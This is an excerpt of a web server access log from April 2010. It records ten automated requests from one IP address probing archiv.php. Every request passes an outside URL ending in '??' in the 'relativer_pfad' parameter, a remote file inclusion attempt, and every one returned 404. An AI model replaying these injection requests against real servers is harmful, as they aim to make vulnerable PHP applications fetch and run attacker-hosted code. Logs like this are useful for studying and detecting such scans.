74.50.85.15 - - [20/Apr/2010:14:10:42 -0500] "GET /archiv.php?relativer_pfad=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:10:42 -0500] "GET /logs/archiv.php?relativer_pfad=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:10:42 -0500] "GET /logs/access_log.1226102400/archiv.php?relativer_pfad=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:10:49 -0500] "GET /logs/access_log.1226102400/archiv.php?relativer_pfad=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:10:55 -0500] "GET /archiv.php?relativer_pfad=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:10:55 -0500] "GET /logs/archiv.php?relativer_pfad=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:10:55 -0500] "GET /logs/access_log.1226102400/archiv.php?relativer_pfad=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:10:58 -0500] "GET /archiv.php?relativer_pfad=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:10:58 -0500] "GET /logs/access_log.1226102400/archiv.php?relativer_pfad=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:10:58 -0500] "GET /logs/archiv.php?relativer_pfad=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
